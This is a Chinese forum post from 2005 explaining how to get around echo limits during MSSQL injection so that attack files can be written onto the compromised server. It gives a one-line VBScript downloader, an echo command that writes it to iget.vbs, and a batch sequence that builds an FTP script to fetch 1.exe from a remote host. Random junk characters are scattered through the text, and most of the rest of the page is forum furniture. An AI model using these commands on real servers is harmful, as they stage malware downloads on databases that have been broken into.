QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 2855|回复: 0
打印 上一主题 下一主题

mssql注射时不可以多次echo的解决办法

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2005-1-23 13:30 |只看该作者 |倒序浏览
|招呼Ta 关注Ta
<>解决办法: ' {9 V8 U$ @; s& p; z
1.iget.vbs一次写入
0 S- n* n$ W& |6 o: v" x/ z在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写 & c  w/ e- D* `0 I+ P

5 p" s8 B; q0 V4 qSet x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 ! X+ G. ^  s1 Y1 [
0 H* g8 f2 ]" w# [) L
这样我们可以一次echo成功,echo版本: & v% t# s- T1 _7 s8 ]/ U8 B
7 a, v6 A. m- E6 z) p& v* D+ J& z
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 &gt;iget.vbs 6 _/ I- \% S0 z* Q0 }" W9 U
, a/ D0 [9 J" J
# V% `3 u5 U' x' R/ t
2.bat调用ftp脚本的写法(by envymask) 5 v% w4 J4 m. Z

& L* L" p& T4 r8 N3 U+ `9 Hecho ftp&gt;1.vbs
; s7 l' G# U+ Q$ o3 g. Hecho open ip&gt;2.vbs
3 u+ I* c- [$ G. l: l! yecho u&gt;3.vbs
) A. s! A% Y/ fecho s&gt;4.vbs - ]3 C3 u3 ~# q* L
echo binary&gt;5.vbs
! \4 \* r3 e9 r% P- o5 W& Vecho get 1.exe&gt;6.vbs 4 f+ }( Q; f* F, i5 q
echo bay&gt;7.vbs
% p$ A# k5 _4 V6 w" @
5 y1 H( D0 ^* n9 ^* \. pcopy 1.vbs+2.vbs+3.vbs+4.vbs+5.vbs+6.vbs+7.vbs new.vbs
. ?3 f7 s- D5 Q( y0 I. H) n</P>
zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-6-11 16:40 , Processed in 0.423016 second(s), 52 queries .

回顶部